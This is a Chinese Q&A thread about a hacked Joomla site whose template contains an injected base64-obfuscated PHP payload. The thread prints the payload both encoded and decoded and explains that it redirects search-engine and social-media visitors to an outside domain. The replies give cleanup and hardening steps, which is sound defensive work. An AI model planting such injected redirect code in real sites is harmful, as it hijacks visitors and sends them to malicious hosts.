0

最近我的 Joomla 网站无法正常显示,只有背景图片正在加载,还有一些小问题。

不知何故,页面模板 (index.php) 被更改并添加了一些额外的代码。具体来说,这段代码:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wb2FzbS5xcG9lLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));

在整个 php 代码中多次引入,这导致我的网站加载时间缓慢(加载任何页面大约需要 15-20 秒)。

4

2 回答 2

2

您的网站似乎被黑了,这意味着它可以再次被黑。

如果您使用的是 Joomla 1.5,您应该至少升级到 2.5.x 行,如果您不能确定您使用的是 1.5.26 版。

接下来根据VEL(Joomla!'s Vulnerable Extensions List)检查您安装的所有扩展

完成此操作后,您应该使用诸如AdminTools之类的产品或来自Joomla 扩展目录的站点保护部分的类似高度评价产品来保护您的站点。

顺便说一下,特定的有效负载是用来捕获搜索引擎引用您网站的用户并将他们重定向到http://poasm.qpoe.com/它解码为:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
            if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"live.com") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or     stristr($referer,"myspace.com") or stristr($referer,"facebook.com/l") or     stristr($referer,"aol.com")) {
                if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                    header("Location: http://poasm.qpoe.com/");
                    exit();
                }
            }
        }
    }
}
于 2013-07-12T06:55:22.073 回答
0

我偶然发现了这条评论,终于能够解决我的问题。

只需进入管理 --> 扩展 --> 模板管理器。转到 Templates 部分,选择您的模板,选择Edit main page template,然后让您的 index.php 摆脱所有那些垃圾函数调用。清理它为我解决了问题,现在一切恢复正常,一切都像以前一样快速加载并且所有页面都正确显示。

于 2013-07-11T18:29:26.040 回答